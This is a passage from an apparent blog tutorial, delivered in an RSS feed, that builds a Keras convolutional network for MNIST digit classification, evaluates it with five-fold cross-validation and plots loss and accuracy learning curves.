</code></pre><p><strong>5. Output Layer:</strong></p><ul><li>The final layer is a dense layer with 10 units and a softmax activation function. This layer outputs the probabilities for each of the 10 digit classes.</li></ul><pre><code class="language-python">model.add(Dense(10, activation=&apos;softmax&apos;))</code></pre><p><strong>Compiling the Model:</strong></p><p>After defining the model architecture, we need to compile the model. Compilation involves specifying the optimizer, loss function, and evaluation metrics. We use the Stochastic Gradient Descent (SGD) optimizer with a learning rate of 0.01 and momentum of 0.9. The loss function is categorical cross-entropy, suitable for multi-class classification tasks. We also specify accuracy as the evaluation metric.</p><p><strong>Complete Function:</strong></p><pre><code class="language-python"># define cnn model
from tensorflow.keras.models import Sequential
from tensorflow.keras.layers import Conv2D, MaxPooling2D, Flatten, Dense
from tensorflow.keras.optimizers import SGD

def define_model():
    model = Sequential()
    model.add(Conv2D(32, (3, 3), activation=&apos;relu&apos;, kernel_initializer=&apos;he_uniform&apos;, input_shape=(28, 28, 1)))
    model.add(MaxPooling2D((2, 2)))
    model.add(Flatten())
    model.add(Dense(100, activation=&apos;relu&apos;, kernel_initializer=&apos;he_uniform&apos;))
    model.add(Dense(10, activation=&apos;softmax&apos;))
    # compile model
    opt = SGD(learning_rate=0.01, momentum=0.9)
    model.compile(optimizer=opt, loss=&apos;categorical_crossentropy&apos;, metrics=[&apos;accuracy&apos;])
    return model</code></pre><h2 id="evaluating-the-model-with-k-fold-cross-validation">Evaluating the Model with K-Fold Cross-Validation</h2><p>To ensure our Convolutional Neural Network (CNN) model generalizes well to unseen data, we evaluate its performance using K-fold cross-validation. This technique involves splitting the training data into K subsets (folds), training the model on K-1 folds, and validating it on the remaining fold. This process is repeated K times, with each fold used exactly once for validation.</p><p><strong>Setting Up K-Fold Cross-Validation:</strong></p><p>We use the <code>KFold</code> class from <code>sklearn.model_selection</code> to create the K-fold splits. Here, we specify 5 folds and enable shuffling with a fixed random seed for reproducibility.</p><pre><code class="language-python">from sklearn.model_selection import KFold
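</code></pre><p>The idea behind the split is simple enough to hand-roll. The toy sketch below (plain NumPy, 10 pretend samples) shows each fold serving as the validation set exactly once:</p>

```python
import numpy as np

indices = np.arange(10)              # pretend we have 10 samples
folds = np.array_split(indices, 5)   # 5 folds of 2 indices each

for i, val_idx in enumerate(folds):
    # every fold except fold i is used for training
    train_idx = np.concatenate([f for j, f in enumerate(folds) if j != i])
    print(i, len(val_idx), len(train_idx))   # 2 validation, 8 training
```

<p><code>KFold</code> handles the same bookkeeping for us, with shuffling and reproducible seeding built in:</p><pre><code class="language-python">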

# prepare cross validation
kfold = KFold(n_folds, shuffle=True, random_state=1)</code></pre><p><strong>Training and Evaluating the Model:</strong></p><p>For each fold, we:</p><ol><li>Define a new instance of the CNN model.</li><li>Split the data into training and validation sets based on the current fold.</li><li>Train the model on the training set for 10 epochs with a batch size of 32.</li><li>Evaluate the model on the validation set and store the accuracy score and training history.</li></ol><pre><code class="language-python"># enumerate splits
for train_ix, test_ix in kfold.split(dataX):
    # define model
    model = define_model()
    # select rows for train and test
    trainX, trainY, testX, testY = dataX[train_ix], dataY[train_ix], dataX[test_ix], dataY[test_ix]
    # fit model
    history = model.fit(trainX, trainY, epochs=10, batch_size=32, validation_data=(testX, testY), verbose=0)
    # evaluate model
    _, acc = model.evaluate(testX, testY, verbose=0)
    print(&apos;&gt; %.3f&apos; % (acc * 100.0))
    # store scores
    scores.append(acc)
    histories.append(history)</code></pre><p><strong>Complete Function:</strong></p><pre><code class="language-python"># evaluate a model using k-fold cross-validation
def evaluate_model(dataX, dataY, n_folds=5):
    scores, histories = list(), list()
    # prepare cross validation
    kfold = KFold(n_folds, shuffle=True, random_state=1)
    # enumerate splits
    for train_ix, test_ix in kfold.split(dataX):
        # define model
        model = define_model()
        # select rows for train and test
        trainX, trainY, testX, testY = dataX[train_ix], dataY[train_ix], dataX[test_ix], dataY[test_ix]
        # fit model
        history = model.fit(trainX, trainY, epochs=10, batch_size=32, validation_data=(testX, testY), verbose=0)
        # evaluate model
        _, acc = model.evaluate(testX, testY, verbose=0)
        print(&apos;&gt; %.3f&apos; % (acc * 100.0))
        # store scores
        scores.append(acc)
        histories.append(history)
    return scores, histories</code></pre><h2 id="visualizing-learning-curves">Visualizing Learning Curves</h2><p>To gain insights into how well our Convolutional Neural Network (CNN) model is training and generalizing, we can visualize the learning curves for both loss and accuracy over epochs. These curves help us understand the model&apos;s performance on the training and validation sets during the training process.</p><p><strong>Plotting Learning Curves:</strong></p><p>We use the <code>matplotlib.pyplot</code> library to create plots that display the training and validation loss and accuracy for each epoch. The <code>summarize_diagnostics()</code> function handles this task by iterating over the training histories recorded during cross-validation.</p><ol><li><strong>Loss Curves:</strong><ul><li>The first subplot displays the cross-entropy loss for both the training and validation datasets.</li><li>This helps us see how the model&apos;s loss decreases over time and whether it converges.</li></ul></li><li><strong>Accuracy Curves:</strong><ul><li>The second subplot shows the classification accuracy for both the training and validation datasets.</li><li>This illustrates how the model&apos;s accuracy improves over time.</li></ul></li></ol><pre><code class="language-python">from matplotlib import pyplot as plt
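</code></pre><p>Each entry in <code>histories</code> is a Keras <code>History</code> object whose <code>.history</code> attribute is a plain dict of per-epoch metric lists. A stand-in with made-up numbers shows the structure the plotting code reads:</p>

```python
# hypothetical three-epoch run; real values come from model.fit()
history = {
    'loss': [0.30, 0.12, 0.08],
    'val_loss': [0.28, 0.15, 0.11],
    'accuracy': [0.91, 0.96, 0.98],
    'val_accuracy': [0.92, 0.95, 0.97],
}
print(len(history['loss']))   # 3 - one value per epoch
```

<p>The function below walks these four lists for every fold and draws the train and validation curves together:</p><pre><code class="language-python">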

# plot diagnostic learning curves
def summarize_diagnostics(histories):
    for i in range(len(histories)):
        # plot loss
        plt.subplot(2, 1, 1)
        plt.title(&apos;Cross Entropy Loss&apos;)
        plt.plot(histories[i].history[&apos;loss&apos;], color=&apos;blue&apos;, label=&apos;train&apos;)
        plt.plot(histories[i].history[&apos;val_loss&apos;], color=&apos;orange&apos;, label=&apos;test&apos;)
        plt.legend([&apos;train&apos;, &apos;test&apos;], loc=&apos;upper right&apos;)

        # plot accuracy
        plt.subplot(2, 1, 2)
        plt.title(&apos;Classification Accuracy&apos;)
        plt.plot(histories[i].history[&apos;accuracy&apos;], color=&apos;blue&apos;, label=&apos;train&apos;)
        plt.plot(histories[i].history[&apos;val_accuracy&apos;], color=&apos;orange&apos;, label=&apos;test&apos;)
        plt.legend([&apos;train&apos;, &apos;test&apos;], loc=&apos;upper right&apos;)

    plt.tight_layout()
    plt.show()</code></pre><h2 id="conclusion">Conclusion</h2><p>In this blog post, we explored the process of building and evaluating a Convolutional Neural Network (CNN) for classifying handwritten digits from the MNIST dataset. We covered the steps of loading and preprocessing the data, defining the CNN model, and evaluating its performance using K-fold cross-validation. Additionally, we visualized learning curves to gain insights into the model&apos;s training process.</p><p>By following these steps, we demonstrated how CNNs can effectively learn and generalize from image data, achieving high accuracy in digit classification. This foundational knowledge can be applied to various other image classification tasks, showcasing the power and versatility of CNNs in computer vision applications.</p>]]></content:encoded></item></channel></rss>